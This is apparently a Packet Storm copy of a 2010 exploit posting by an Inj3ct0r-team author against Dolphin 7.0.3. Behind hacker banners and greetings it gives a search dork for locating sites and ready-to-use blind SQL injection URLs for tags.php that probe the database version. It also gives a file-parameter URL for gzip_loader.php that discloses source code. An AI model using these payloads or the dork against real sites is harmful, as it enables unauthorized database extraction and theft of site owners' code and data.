Dolphin version 7.0.3 suffers from source code disclosure and remote SQL injection vulnerabilities.
954cb7503718099ce65239ca7b7992db93c75dd75f23bbaf146eccee824a9209=====================================================================
Dolphin Vulnerability SQL Injection / disclosure Vulnerability
=====================================================================
|| || | ||
o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
( : / (_) / ( .
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################### 1
0 I'm anT!-Tr0J4n member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
# Exploit Title: Dolphin Mullti Vulnerability
# Date : 29-10-2010
# Author : anT!-Tr0J4n
# Version : 7.0.3
#DorK : Powered by Dolphin
#Greetz : Dev-PoinT.com ~ inj3ct0r.com ~ All Dev-poinT members and my friends
# Home : www.Dev-PoinT.com : http://inj3ct0r.com
#Email : D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com
# Software Link : http://sourceforge.net/projects/boonex-dolphin
======================================================
[>] Dolphin Blind SQL Injection Vulnerability
======================================================
http://server/Dolphin/tags.php?action=[BSQLi]
http://localhost/Dolphin/tags.php?action=1+and substring(@@version,1,1)=5 --> True
http://localhost/Dolphin/tags.php?action=1+and substring(@@version,1,1)=4 --> False
========================================================
Dolphin source code disclosure Vulnerability
========================================================
[>] exploit ->
http://localhost/Dolphin/gzip_loader.php?file=(file name)
=-=-=-=--=-=-=-=-=--=-=-=-=-
#Greetz : Dev-PoinT.com ~ inj3ct0r.com ; GlaDiatOr ;SILVER STAR ; HoBeeZ ; Coffin Of Evil ; Cyber-Err0r ; Mr.Mh$TEr ; M [Zero] ; R3d-D3v1l
#special thanks : r0073r ; Sid3^effects ; L0rd CrusAd3r ; all Inj3ct0r 31337 Member
# I'm anT!-Tr0J4n member from Inj3ct0r Team
#[+] Site : Inj3ct0r.com
#[+] Support e-mail : submit[at]inj3ct0r.com
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed